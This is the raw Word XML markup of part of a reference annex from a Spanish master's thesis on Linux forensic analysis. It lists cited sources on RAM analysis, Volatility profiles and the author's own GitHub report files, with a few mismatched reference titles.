    <w:p w14:paraId="5EA89470" w14:textId="242FF491" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: Memoria RAM en Linux; una valiosa fuente de información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04537CB6" w14:textId="1EB2D985" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId302" w:history="1">
        <w:r w:rsidR="005F5944" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://bytelearning.blogspot.com/2017/02/memoria-ram-linux-fuente-informacion.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E3F470" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="0366E927" w14:textId="75CEA9E3" w:rsidR="00591474" w:rsidRDefault="005D0BE7" w:rsidP="00810E29">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="_Ref155733977"/>
      <w:bookmarkStart w:id="238" w:name="_Toc155782561"/>
      <w:r>
        <w:t>Referencia</w:t>
      </w:r>
      <w:r w:rsidRPr="00555249">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="005F5944">
        <w:t>IV</w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w14:paraId="576324EB" w14:textId="77777777" w:rsidR="00810E29" w:rsidRDefault="00810E29" w:rsidP="00810E29">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E845AC0" w14:textId="569A3A49" w:rsidR="00831B26" w:rsidRDefault="00831B26" w:rsidP="00810E29">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F5944">
        <w:t>Creación de perfil en Volatility (andreafortuna):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B16708" w14:textId="15E398A1" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: andreafortuna.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCA3FC7" w14:textId="6AC050AE" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: How to generate a Volatility profile for a Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD6CAB" w14:textId="4E4F9763" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId303" w:history="1">
        <w:r w:rsidR="005F5944" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://andreafortuna.org/2019/08/22/how-to-generate-a-volatility-profile-for-a-linux-system/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3EAF84" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="4FCB4502" w14:textId="44234ECB" w:rsidR="00831B26" w:rsidRDefault="00831B26">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="718B72C4" w14:textId="1027E73E" w:rsidR="005F5944" w:rsidRDefault="005D0BE7" w:rsidP="00810E29">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="_Ref155751606"/>
      <w:bookmarkStart w:id="240" w:name="_Toc155782562"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Referencia</w:t>
      </w:r>
      <w:r w:rsidRPr="00555249">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="005F5944">
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w14:paraId="0282202D" w14:textId="77777777" w:rsidR="005F5944" w:rsidRDefault="005F5944" w:rsidP="00591474"/>
    <w:p w14:paraId="3574E177" w14:textId="5FFA53F1" w:rsidR="00831B26" w:rsidRDefault="00831B26" w:rsidP="00591474">
      <w:r w:rsidRPr="00810E29">
        <w:t>Informe memmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04908D9C" w14:textId="1DF336EE" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: José Enrique Rodríguez González.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38954043" w14:textId="677CCCE6" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: 008-informe-memmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF12B8" w14:textId="0A110A09" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId304" w:history="1">
        <w:r w:rsidR="00810E29" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/008-informe-memmap.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BE35664" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="59D96ADD" w14:textId="6E88DAFC" w:rsidR="00810E29" w:rsidRDefault="005D0BE7" w:rsidP="00810E29">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="_Ref155739960"/>
      <w:bookmarkStart w:id="242" w:name="_Toc155782563"/>
      <w:r>
        <w:t>Referencia</w:t>
      </w:r>
      <w:r w:rsidRPr="00555249">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00810E29" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00810E29">
        <w:t>VI</w:t>
      </w:r>
      <w:r w:rsidR="00810E29" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:p w14:paraId="46041BA4" w14:textId="77777777" w:rsidR="00810E29" w:rsidRDefault="00810E29" w:rsidP="00591474"/>
    <w:p w14:paraId="7D509FBC" w14:textId="190CF69F" w:rsidR="00831B26" w:rsidRDefault="00831B26" w:rsidP="00591474">
      <w:r w:rsidRPr="00810E29">
        <w:t>Informe dmesg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00482E77" w14:textId="346B2823" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: José Enrique Rodríguez González.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2B345D" w14:textId="1528ABB7" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: 009-informe-dmesg.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5084C946" w14:textId="75F430E2" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId305" w:history="1">
        <w:r w:rsidR="00810E29" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/009-informe-dmesg.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="112A6377" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="1F6C8F8D" w14:textId="46CD7C44" w:rsidR="00810E29" w:rsidRDefault="00831B26" w:rsidP="00810E29">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="_Ref155739966"/>
      <w:bookmarkStart w:id="244" w:name="_Toc155782564"/>
      <w:r>
        <w:t>Referencia</w:t>
      </w:r>
      <w:r w:rsidRPr="00555249">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00810E29" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00810E29">
        <w:t>VII</w:t>
      </w:r>
      <w:r w:rsidR="00810E29" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="243"/>
      <w:bookmarkEnd w:id="244"/>
    </w:p>
    <w:p w14:paraId="78D602CE" w14:textId="77777777" w:rsidR="00810E29" w:rsidRDefault="00810E29" w:rsidP="00591474"/>
    <w:p w14:paraId="6A536B31" w14:textId="1D442C84" w:rsidR="00831B26" w:rsidRDefault="00831B26" w:rsidP="00591474">
      <w:r w:rsidRPr="00810E29">
        <w:t>Security elinux.org:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A43E2B0" w14:textId="3DCF45FB" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: Wmat</w:t>
      </w:r>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C306A" w14:textId="53BC8FE4" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Ultimo editor: Tim Bird</w:t>
      </w:r>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA0802" w14:textId="03E8F247" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título visualizado: Security</w:t>
      </w:r>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD202B9" w14:textId="1AA3361B" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Criterio de ordenación predeterminado: Security</w:t>
      </w:r>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BF76C7" w14:textId="23B21B58" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId306" w:history="1">
        <w:r w:rsidR="00810E29" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://elinux.org/Security</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460C7DA5" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="7CEFC89A" w14:textId="4A8BA811" w:rsidR="007E5C88" w:rsidRDefault="00831B26" w:rsidP="007E5C88">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="_Ref155739911"/>
      <w:bookmarkStart w:id="246" w:name="_Toc155782565"/>
      <w:r>
        <w:t>Referencia</w:t>
      </w:r>
      <w:r w:rsidRPr="00555249">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E5C88" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="007E5C88">
        <w:t>VIII</w:t>
      </w:r>
      <w:r w:rsidR="007E5C88" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
      <w:bookmarkEnd w:id="246"/>
    </w:p>
    <w:p w14:paraId="08FEFC35" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="0611BDA6" w14:textId="71A5502F" w:rsidR="00831B26" w:rsidRDefault="00831B26" w:rsidP="00591474">
      <w:r w:rsidRPr="007E5C88">
        <w:t>Package: python3-certbot-apache (2.1.0-2)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBD1684" w14:textId="078D768C" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: Debian.org</w:t>
      </w:r>
      <w:r w:rsidR="007E5C88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6015A543" w14:textId="3361BFA7" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título visualizado: Package: python3-certbot-apache (2.1.0-2)</w:t>
      </w:r>
      <w:r w:rsidR="007E5C88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971D6FA" w14:textId="1625CD0D" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId307" w:history="1">
        <w:r w:rsidR="007E5C88" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://packages.debian.org/sid/python3-certbot-apache</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007E5C88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F511447" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="091F4F3F" w14:textId="112FE72D" w:rsidR="00831B26" w:rsidRDefault="00831B26">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DD960" w14:textId="407A2CED" w:rsidR="007E5C88" w:rsidRDefault="00831B26" w:rsidP="007E5C88">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="247" w:name="_Ref155739861"/>
      <w:bookmarkStart w:id="248" w:name="_Toc155782566"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Referencia</w:t>
      </w:r>
      <w:r w:rsidRPr="00555249">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E5C88" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="007E5C88">
        <w:t>IX</w:t>
      </w:r>
      <w:r w:rsidR="007E5C88" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="247"/>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p w14:paraId="2F8DD214" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="29199E7A" w14:textId="56E17C3F" w:rsidR="00831B26" w:rsidRDefault="00831B26" w:rsidP="00591474">
      <w:r w:rsidRPr="007E5C88">
        <w:t>Informe tree:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125B4F0" w14:textId="3B2F3428" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: José Enrique Rodríguez González.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B2165" w14:textId="6B6C3CE7" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: 011-informe-tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D0119" w14:textId="41229242" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId308" w:history="1">
        <w:r w:rsidR="007E5C88" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/010-informe-tree.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007E5C88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFFFB05" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="4393AE99" w14:textId="2CD70714" w:rsidR="007E5C88" w:rsidRDefault="00831B26" w:rsidP="007E5C88">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="_Ref155751372"/>
      <w:bookmarkStart w:id="250" w:name="_Toc155782567"/>
      <w:r>
        <w:t>Referencia</w:t>
      </w:r>
      <w:r w:rsidRPr="00555249">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E5C88" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="007E5C88">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="007E5C88" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
      <w:bookmarkEnd w:id="250"/>
    </w:p>
    <w:p w14:paraId="3D773D76" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="77BE11CE" w14:textId="51BE1541" w:rsidR="00831B26" w:rsidRDefault="00831B26" w:rsidP="00591474">
      <w:r w:rsidRPr="007E5C88">
        <w:t>Informe invalid user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E43866E" w14:textId="66611D20" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: José Enrique Rodríguez González.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F88E84C" w14:textId="101A8FED" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: 011-informe-tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244B09B" w14:textId="5A117C38" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId309" w:history="1">
        <w:r w:rsidR="007E5C88" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/011-informe-invalid-user-login.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007E5C88">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7BA9C" w14:textId="77777777" w:rsidR="005670E5" w:rsidRDefault="005670E5" w:rsidP="00D52A79"/>
    <w:p w14:paraId="3A9B7549" w14:textId="77777777" w:rsidR="005670E5" w:rsidRDefault="005670E5" w:rsidP="00D52A79"/>
    <w:p w14:paraId="0CB2768D" w14:textId="77777777" w:rsidR="005670E5" w:rsidRDefault="005670E5" w:rsidP="00D52A79"/>
    <w:p w14:paraId="746758D8" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRPr="00D52A79" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:sectPr w:rsidR="00520AAC" w:rsidRPr="00D52A79" w:rsidSect="00B93CA3">
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11907" w:h="16840"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CE4B15" w14:textId="77777777" w:rsidR="00B93CA3" w:rsidRDefault="00B93CA3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2351DF" w14:textId="77777777" w:rsidR="00B93CA3" w:rsidRDefault="00B93CA3"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="456A1297" w14:textId="77777777" w:rsidR="00B93CA3" w:rsidRDefault="00B93CA3">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11580C1E" w14:textId="77777777" w:rsidR="00B93CA3" w:rsidRDefault="00B93C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UI-Bold">
    <w:altName w:val="Segoe U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448B2" w14:textId="77777777" w:rsidR="00705474" w:rsidRDefault="00705474" w:rsidP="0099135C">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14:paraId="2B05A331" w14:textId="77777777" w:rsidR="00705474" w:rsidRDefault="00705474" w:rsidP="007E5E0A">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:ind w:right="360"/>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08080" w14:textId="77777777" w:rsidR="001024F7" w:rsidRDefault="001024F7" w:rsidP="00A45771">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="6022" w:y="-80"/>
      <w:rPr>
        <w:rStyle w:val="Nmerodepgina"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="55FE966D" w14:textId="77777777" w:rsidR="001024F7" w:rsidRPr="00D41EF4" w:rsidRDefault="001024F7" w:rsidP="00A45771">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r w:rsidR="00880E66">
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve">   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="009F5EF9">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>ii</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77780" w14:textId="77777777" w:rsidR="001024F7" w:rsidRDefault="001024F7" w:rsidP="00C4245F">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="6022" w:y="-80"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rStyle w:val="Nmerodepgina"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="006931A4">
      <w:rPr>
        <w:rStyle w:val="Nmerodepgina"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="006931A4">
      <w:rPr>
        <w:rStyle w:val="Nmerodepgina"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r w:rsidR="00880E66">
      <w:rPr>
        <w:rStyle w:val="Nmerodepgina"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidRPr="006931A4">
      <w:rPr>
        <w:rStyle w:val="Nmerodepgina"/>
      </w:rPr>
      <w:instrText xml:space="preserve">   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="006931A4">
      <w:rPr>
        <w:rStyle w:val="Nmerodepgina"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="009F5EF9">
      <w:rPr>
